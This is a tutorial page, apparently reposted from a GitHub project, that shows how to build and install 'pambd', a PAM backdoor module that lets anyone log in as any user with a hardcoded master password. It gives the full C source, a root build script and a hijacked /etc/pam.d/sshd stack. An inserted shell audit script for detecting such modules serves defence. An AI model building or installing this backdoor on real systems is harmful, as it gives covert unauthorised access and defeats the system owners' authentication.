This trick shows you how to create a PAM module backdoor that lets you log in as any user with your own custom master password.
Because both pam_unix.so and pambd.so are stacked as 'sufficient', the target user's real password still works through pam_unix.so, and when that check fails PAM falls through to pambd.so, which accepts the master password instead (and vice versa).
Generate the backdoor by compiling pambd.c with gen.sh (both are listed below). If compilation fails with the error:
pambd.c:13:31: fatal error: security/pam_appl.h: No such file or directory
first install the package libpam0g-dev, which contains the PAM header files needed for compilation:
deftcode pambd $ sudo apt-get install libpam0g-dev
Now edit pambd.c and set your own master password:
#define MYPASSWD "my_master_passwd"
After that, generate the pam backdoor with the following command (root permissions are needed because the script writes the module into /lib/security):
deftcode pambd $ sudo sh gen.sh
::Configure the PAM service you want to hijack::
Edit /etc/pam.d/sshd (or another service that uses PAM, such as /etc/pam.d/su) and replace its content with these lines. Note that a bare module name is resolved relative to the PAM module directory, which on multiarch Debian/Ubuntu is /lib/x86_64-linux-gnu/security rather than /lib/security (check with ls /lib/*/security); either install pambd.so there or reference it by absolute path:
auth sufficient pam_rootok.so
auth sufficient pam_unix.so # This must be 'sufficient'.
account required pam_unix.so
session required pam_unix.so
auth sufficient pambd.so # This is our pam backdoor.
account sufficient pambd.so # --
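To see the same stack from the defender's side, here is an added example that is not part of pambd or of the original page: a POSIX shell audit that reads a PAM service file on stdin and flags every entry whose module is outside a baseline list, treating an 'auth sufficient' entry on an unknown module as a bypass candidate, which is exactly what the configuration above creates. The baseline list, the sample configuration and the verify_module_owner helper (which just wraps dpkg -S / rpm -qf) are assumptions made for illustration; a real audit should build the baseline from the package database of the host.

```shell
#!/bin/sh
# audit_pam_stack.sh - spot a pambd-style module in a PAM service file.
# Added example for this page, not part of the pambd project.

# Baseline of modules expected in a stock Debian/Ubuntu sshd or su stack.
# ASSUMPTION: illustrative only; derive the real list from your packages.
KNOWN_MODULES="pam_unix.so pam_rootok.so pam_env.so pam_nologin.so pam_deny.so
pam_permit.so pam_limits.so pam_motd.so pam_mail.so pam_loginuid.so
pam_keyinit.so pam_systemd.so pam_securetty.so pam_faildelay.so pam_selinux.so"

is_known_module() {
    for m in $KNOWN_MODULES; do
        [ "$m" = "$1" ] && return 0
    done
    return 1
}

# audit_pam_stack: read a PAM service file on stdin and print one finding
# per line, e.g.
#   AUTH-BYPASS-CANDIDATE auth sufficient pambd.so
#   UNKNOWN-MODULE account sufficient pambd.so
# Prints nothing when every module is in the baseline. Always returns 0.
audit_pam_stack() {
    set -f                              # no globbing while word-splitting lines
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}                # drop comments
        set -- $line                    # split into type control module [args]
        [ $# -lt 3 ] && continue        # blanks, "@include x", etc.
        mtype=${1#-}; control=$2; shift 2   # "-auth" means "silent if missing"
        case "$control" in
            include|substack) continue ;;
            \[*\]) control='[...]' ;;   # single-token bracketed control
            \[*)                        # "[success=1 default=ignore]" spans tokens
                control='[...]'
                while [ $# -gt 0 ]; do
                    tok=$1; shift
                    case "$tok" in *\]) break ;; esac
                done
                ;;
        esac
        [ $# -lt 1 ] && continue
        module=${1##*/}                 # PAM accepts absolute paths; use basename
        if is_known_module "$module"; then
            continue
        fi
        if [ "$mtype" = auth ] && [ "$control" = sufficient ]; then
            echo "AUTH-BYPASS-CANDIDATE $mtype $control $module"
        else
            echo "UNKNOWN-MODULE $mtype $control $module"
        fi
    done
    set +f
    return 0
}

# verify_module_owner: report which package owns a module file, if any.
# A module no package claims (as pambd.so would be) is a red flag.
verify_module_owner() {
    if command -v dpkg >/dev/null 2>&1; then
        dpkg -S "$1" 2>/dev/null || echo "NOT-OWNED $1"
    elif command -v rpm >/dev/null 2>&1; then
        rpm -qf "$1" 2>/dev/null || echo "NOT-OWNED $1"
    else
        echo "NO-PACKAGE-MANAGER $1"
    fi
}

# Constructed sample: the hijacked stack from this page.
HIJACKED_STACK='auth sufficient pam_rootok.so
auth sufficient pam_unix.so # This must be "sufficient".
account required pam_unix.so
session required pam_unix.so
auth sufficient pambd.so # This is our pam backdoor.
account sufficient pambd.so'

# Demo run on the constructed sample. On a real host use:
#   audit_pam_stack < /etc/pam.d/sshd
#   verify_module_owner /lib/x86_64-linux-gnu/security/pambd.so
printf '%s\n' "$HIJACKED_STACK" | audit_pam_stack
```

The audit keys on two facts that are visible in the configuration rather than in the binary: a module name that no baseline (or package) accounts for, and the 'sufficient' control flag on the auth stack, which is what lets a failed pam_unix.so check fall through to the backdoor.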
::Test the backdoor::
After you have created the pambd backdoor, you can check that the module was built and installed as a shared object:
deftcode pambd $ file /lib/security/pambd.so
/lib/security/pambd.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
gen.sh – generate the pam backdoor. Script:
#!/bin/bash
# gen.sh - generate the pam backdoor.

BIN_GCC='/usr/bin/gcc'
BIN_LD='/usr/bin/ld'
BIN_RM='/bin/rm'
CFLAGS='-fPIC'
LDFLAGS='-x --shared'

if [ "$(id -u)" != '0' ]; then
    echo 'This script must be run as root!' 1>&2
    exit 1
fi

${BIN_GCC} ${CFLAGS} -c pambd.c
# The output name must match the module referenced in /etc/pam.d/<service>
# (pambd.so); the original wrote pam_bd.so, which that configuration never loads.
${BIN_LD} ${LDFLAGS} -o /lib/security/pambd.so pambd.o
${BIN_RM} pambd.o
pambd.c – A small pam backdoor. Script:
/**
 * pambd.c - A small pam backdoor.
 * Federico Fazzi <eurialo@deftcode.ninja>
 *
 * This trick shows you how to create a PAM module backdoor that
 * lets you log in as any user with your own custom master password.
 *
 * If you log in with the real password of the target user and the
 * authentication fails, PAM falls through from pam_unix.so to
 * pambd.so, and vice versa!
 *
 * (c) 2015 - MIT License.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <security/pam_appl.h>
#include <security/pam_modules.h>
#include <security/pam_ext.h>      /* declares pam_get_authtok() */

#define MYPASSWD "my_master_passwd"

/* Nothing to do for credentials: report success so the stack continues. */
PAM_EXTERN int pam_sm_setcred(pam_handle_t *pamh, int flags,
                              int argc, const char **argv)
{
    return PAM_SUCCESS;
}

/* Account management: the account is always "valid" for this module. */
PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags,
                                int argc, const char **argv)
{
    return PAM_SUCCESS;
}

/* Authentication: accept exactly the master password, reject anything else. */
PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags,
                                   int argc, const char **argv)
{
    const char *password = NULL;

    /* Ask PAM for the password the user typed (prompting if none is cached). */
    if (pam_get_authtok(pamh, PAM_AUTHTOK, &password, NULL) != PAM_SUCCESS
        || password == NULL)
        return PAM_AUTH_ERR;

    /* Exact compare: the original strncmp(..., strlen(MYPASSWD)) accepted any
     * password that merely started with the master password. */
    if (strcmp(password, MYPASSWD) == 0)
        return PAM_SUCCESS;

    return PAM_AUTH_ERR;
}
Source : https://github.com/eurialo